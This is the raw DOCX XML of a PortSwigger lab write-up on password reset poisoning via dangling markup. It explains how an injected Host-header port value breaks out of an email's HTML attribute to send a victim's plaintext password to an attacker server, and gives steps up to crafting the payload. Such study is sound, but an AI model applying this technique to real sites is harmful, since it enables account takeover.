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888888"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LAB WRITEUP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">Password Reset Poisoning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">via Dangling Markup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Difficulty: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">EXPERT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">   |   Category: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP Host Header Attacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="480" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="999999"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Platform: PortSwigger Web Security Academy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E74B5" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This lab demonstrates a Password Reset Poisoning attack combined with Dangling Markup Injection. By injecting a malicious payload into the HTTP Host header of a password reset request, an attacker tricks the server into embedding an open HTML tag in the victim's email body. This dangling tag captures the plaintext password and exfiltrates it to an attacker-controlled server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The attack exploits two weaknesses simultaneously:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The server blindly trusts the Host header to construct password reset emails</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The raw email view reflects Host header content without HTML encoding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab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Property</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="2E74B5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>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E8EDF5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability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333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Password Reset Poisoning via Dangling Markup</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E8EDF5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Attack Vector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333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP Host Header Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E8EDF5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Affected Endpoint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333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">POST /forgot-password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E8EDF5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Root Cause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333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Unsanitized Host header reflected in email HTML</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E8EDF5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Impact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333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Full account takeover</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E8EDF5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Your Credentials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333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">wiener : peter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E8EDF5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Target Account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333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">carlos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E74B5" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Background: Key Concepts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">What is a Dangling Markup Attack?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Dangling markup injection occurs when an attacker injects an unclosed HTML tag (e.g., &lt;a href="...) into a page or email. Since the tag is never closed, the browser/email client treats everything that follows — potentially including sensitive content — as part of the tag's attribute value. This effectively "slurps up" the content and sends it to the attacker's server as part of a URL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Why Does the Host Header Matter Here?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Web applications often use the Host header to dynamically build links in emails — for example, in a password reset flow. If the server reflects this header value without validation, an attacker can manipulate it to inject content into the email body.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Why Does This Bypass DOMPurify?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The lab's email client sanitizes rendered HTML using DOMPurify. However, there is a separate "View Raw HTML" feature that displays the email's raw HTML without sanitization. This raw view is what makes the attack exploitable — the dangling markup executes in the context of this unsanitized display.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E74B5" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Step-by-Step Solution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1 — Understand the Password Reset Flow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Log in as wiener:peter and navigate to the forgot-password page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Submit a reset request for the wiener account.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to the exploit server's email client and open the reset email.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Observe: the email contains a new plaintext password rather than a reset token link.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2 — Find the Injection Point</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In Burp Suite, locate the POST /forgot-password request in the proxy history.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Send it to Repeater. Try changing the Host header domain — you will get a server error.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Instead, append an arbitrary non-numeric port string to the original host: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after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Host: YOUR-LAB-ID.web-security-academy.net:arbitraryport</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Send the request. You still receive a valid password reset email.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Check the raw HTML of the email. The injected port value appears unescaped inside a single-quoted HTML attribute — this is the injection point.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3 — Craft the Dangling Markup Payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The goal is to break out of the single-quoted attribute string and inject an open &lt;a href= tag that points to your exploit server. The payload goes in the port position of the Host header:</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after="20" w:before="20"/>
            </w:pPr>
